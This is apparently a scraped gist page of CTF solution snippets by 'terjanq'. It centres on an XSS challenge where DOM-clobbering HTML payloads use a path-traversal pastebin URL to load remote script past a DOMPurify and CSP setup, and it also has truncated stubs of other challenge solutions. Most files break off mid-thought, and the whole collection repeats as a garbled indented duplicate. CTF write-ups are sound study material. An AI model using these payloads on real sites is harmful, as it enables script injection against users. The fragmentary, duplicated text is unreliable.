terjanq

## scriptless_solve.html

<body>

</body>
<script>


/*
    Quasi-scriptless (3 solves)


## part1.py
# The solution comes from the paper https://sci-hub.tw/10.1007/BF03025305
# Which I got from p4 team.

import random
from math import factorial

SET_SIZE = 8
MAX_VAL = 40000

# get random 8 integers

## writeupBin_for_bots.py
from flask import Flask
import time
import requests
import os
import re
import sys


app = Flask(__name__)

## car_repair.js
/*
 *  This is a solution to "Car repair shop" challenge from hack.lu ctf 2019
 *  Solves: 9
 *  10/23/2019 © by terjanq
*/

/* The idea of the solution is: */

function WoW(){ this.Oo = 'O.o'; }
var x = new WoW();

## solution-225.html
<!-- 225 char solution (remove new lines) -->
<a href=//pastebin.com/how-can-i-escape-this%2f..%2fraw/LiE18yqs? id=testPath name=protocol>
<form id=CONFIG>
<img id=testPath name=test>

## solution-212.html
<!-- Solution 212! (remove new lines) -->
<a id=CONFIG name=test>
<p>
<a href=//pastebin.com/how-can-i-escape-this%2f..%2fraw/LiE18yqs? id=testPath name=protocol>
<p>
T

## solution-214.html
<!-- Solution 214 - with a strange behaviour in browsers (remove new lines) -->
<a href=//pastebin.com/how-can-i-escape-this%2f..%2fraw/LiE18yqs? id=testPath name=protocol>
<form id=CONFIG>
<img id=test>
<a>

## straight-forward-solution.html
<a href="https://pastebin.com" id="testPath"></a>
<a id="CONFIG" name=test></a>
<a id="CONFIG" name="version" href="cid:/../../../../how-can-i-escape-this%2f..%2fraw/LiE18yqs?"></a>

## main.js
window.CONFIG = window.CONFIG || {
  version: "v20190816",
  test: false,
  appName: "XSS Challenge",
}

function loadModule(moduleName) {
  const scriptSrc = new URL(document.currentScript.src);
  let url = '';


## injection_point.js
const sanitized = DOMPurify.sanitize(input.value);

const html = `
  <meta http-equiv=Content-Security-Policy content="script-src https://pastebin.com/how-can-i-escape-this/ 'nonce-xyz' https://securitymb.github.io/xss/1/modules/v20190816/">
  <h1>Homepage!</h1>
  <p>Welcome to my homepage! Here are some info about me:</p>
  ${sanitized}
  <script nonce=xyz src="./main.js"><\/script>
`;
	# The solution comes from the paper https://sci-hub.tw/10.1007/BF03025305
	# Which I got from p4 team.

	import random
	from math import factorial

	SET_SIZE = 8
	MAX_VAL = 40000

	# get random 8 integers
	from flask import Flask
	import time
	import requests
	import os
	import re
	import sys


	app = Flask(__name__)
	/*
	* This is a solution to "Car repair shop" challenge from hack.lu ctf 2019
	* Solves: 9
	* 10/23/2019 © by terjanq
	*/

	/* The idea of the solution is: */

	function WoW(){ this.Oo = 'O.o'; }
	var x = new WoW();
	<!-- 225 char solution (remove new lines) -->
	<a href=//pastebin.com/how-can-i-escape-this%2f..%2fraw/LiE18yqs? id=testPath name=protocol>
	<form id=CONFIG>
	<img id=testPath name=test>
	<!-- Solution 212! (remove new lines) -->
	<a id=CONFIG name=test>
	<p>
	<a href=//pastebin.com/how-can-i-escape-this%2f..%2fraw/LiE18yqs? id=testPath name=protocol>
	<p>
	T
	<!-- Solution 214 - with a strange behaviour in browsers (remove new lines) -->
	<a href=//pastebin.com/how-can-i-escape-this%2f..%2fraw/LiE18yqs? id=testPath name=protocol>
	<form id=CONFIG>
	<img id=test>
	<a>
	<a href="https://pastebin.com" id="testPath"></a>
	<a id="CONFIG" name=test></a>
	<a id="CONFIG" name="version" href="cid:/../../../../how-can-i-escape-this%2f..%2fraw/LiE18yqs?"></a>
	window.CONFIG = window.CONFIG \|\| {
	version: "v20190816",
	test: false,
	appName: "XSS Challenge",
	}

	function loadModule(moduleName) {
	const scriptSrc = new URL(document.currentScript.src);
	let url = '';
	const sanitized = DOMPurify.sanitize(input.value);

	const html = `
	<meta http-equiv=Content-Security-Policy content="script-src https://pastebin.com/how-can-i-escape-this/ 'nonce-xyz' https://securitymb.github.io/xss/1/modules/v20190816/">
	<h1>Homepage!</h1>
	<p>Welcome to my homepage! Here are some info about me:</p>
	${sanitized}
	<script nonce=xyz src="./main.js"><\/script>
	`;